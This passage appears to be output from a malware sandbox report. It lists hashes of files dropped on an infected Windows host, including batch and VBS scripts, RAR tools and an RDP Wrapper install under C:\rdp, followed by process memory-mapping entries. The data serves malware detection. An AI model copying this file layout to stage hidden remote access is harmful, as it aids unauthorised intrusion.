                                                                                                                                                                                                                                                          6e95dc04990ccf4825e8506654503f5c79b87e0a89ac51f90ad647e0e9cbf6dabed7488a0c74a879d456b1a3c17dcb7c878126064a11b9eecb08704d6abc1e5c

                                                                                                                                                                                                                                                        • C:\programdata\microsoft\temp\H.bat
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          ec45b066a80416bdb06b264b7efed90d

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          6679ed15133f13573c1448b5b16a4d83485e8cc9

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          0b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c

                                                                                                                                                                                                                                                        • C:\rdp\RDPWInst.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          3288c284561055044c489567fd630ac2

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                                                                                                                                                                                                                        • C:\rdp\RDPWInst.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          3288c284561055044c489567fd630ac2

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                                                                                                                                                                                                                        • C:\rdp\RDPWInst.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          3288c284561055044c489567fd630ac2

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                                                                                                                                                                                                                        • C:\rdp\Rar.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          2e86a9862257a0cf723ceef3868a1a12

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          a4324281823f0800132bf13f5ad3860e6b5532c6

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

                                                                                                                                                                                                                                                        • C:\rdp\Rar.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          2e86a9862257a0cf723ceef3868a1a12

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          a4324281823f0800132bf13f5ad3860e6b5532c6

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

                                                                                                                                                                                                                                                        • C:\rdp\bat.bat
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          5835a14baab4ddde3da1a605b6d1837a

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          94b73f97d5562816a4b4ad3041859c3cfcc326ea

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e

                                                                                                                                                                                                                                                        • C:\rdp\db.rar
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          462f221d1e2f31d564134388ce244753

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          6b65372f40da0ca9cd1c032a191db067d40ff2e3

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          5e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086

                                                                                                                                                                                                                                                        • C:\rdp\install.vbs
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          6d12ca172cdff9bcf34bab327dd2ab0d

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342

                                                                                                                                                                                                                                                        • C:\rdp\pause.bat
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          a47b870196f7f1864ef7aa5779c54042

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          dcb71b3e543cbd130a9ec47d4f847899d929b3d2

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60

                                                                                                                                                                                                                                                        • C:\rdp\run.vbs
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          6a5f5a48072a1adae96d2bd88848dcff

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          b381fa864db6c521cbf1133a68acf1db4baa7005

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

                                                                                                                                                                                                                                                        • \??\c:\program files\rdp wrapper\rdpwrap.dll
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          461ade40b800ae80a40985594e1ac236

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          b3892eef846c044a2b0785d54a432b3e93a968c8

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

                                                                                                                                                                                                                                                        • \??\c:\program files\rdp wrapper\rdpwrap.ini
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          dddd741ab677bdac8dcd4fa0dda05da2

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          69d328c70046029a1866fd440c3e4a63563200f9

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

                                                                                                                                                                                                                                                        • \Program Files\RDP Wrapper\rdpwrap.dll
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          461ade40b800ae80a40985594e1ac236

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          b3892eef846c044a2b0785d54a432b3e93a968c8

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

                                                                                                                                                                                                                                                        • memory/188-36-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/212-64-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/384-79-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/496-38-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/508-43-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/576-34-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/696-69-0x0000000000D30000-0x0000000000D31000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/696-57-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/736-73-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/996-47-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/1336-63-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/1384-60-0x0000000000AD0000-0x0000000000AD1000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/1384-52-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/1444-40-0x0000000002F80000-0x0000000002F81000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/1444-42-0x0000000002F80000-0x0000000002F81000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/1444-41-0x0000000003780000-0x0000000003781000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/1444-31-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/1444-46-0x0000000000D70000-0x0000000000D71000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/1500-113-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/2112-25-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/2132-59-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/2180-21-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/2232-26-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/2272-86-0x0000000000A50000-0x0000000000A51000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/2272-71-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/2468-78-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/2484-3-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/2484-6-0x0000000003370000-0x0000000003371000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/2528-7-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3008-61-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3112-76-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3208-2-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3476-51-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3580-70-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/3636-55-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3648-77-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3668-84-0x0000000000AA0000-0x0000000000AA1000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/3668-83-0x0000000003550000-0x0000000003551000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/3668-72-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3668-81-0x0000000002D50000-0x0000000002D51000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/3700-45-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3820-28-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3892-54-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3908-80-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3916-65-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/3940-30-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4008-39-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4012-48-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4084-56-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4168-82-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4236-85-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4296-87-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4352-88-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4368-89-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4380-90-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4400-118-0x0000000000A60000-0x0000000000A61000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/4432-91-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4440-92-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4476-93-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4512-94-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4620-95-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4632-96-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4652-97-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4672-98-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4780-99-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4792-100-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4808-101-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4820-102-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4864-103-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4880-104-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4892-154-0x000002832ECD0000-0x000002832ECE4000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                                                        • memory/4892-155-0x00007FF7DEE70000-0x00007FF7DF410000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          5.6MB

                                                                                                                                                                                                                                                        • memory/4892-156-0x000002832ED00000-0x000002832ED20000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          128KB

                                                                                                                                                                                                                                                        • memory/4892-157-0x000002832ED20000-0x000002832ED40000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          128KB

                                                                                                                                                                                                                                                        • memory/4908-105-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4964-106-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/4988-108-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5020-109-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5032-110-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5072-111-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/5080-112-0x0000000000000000-mapping.dmp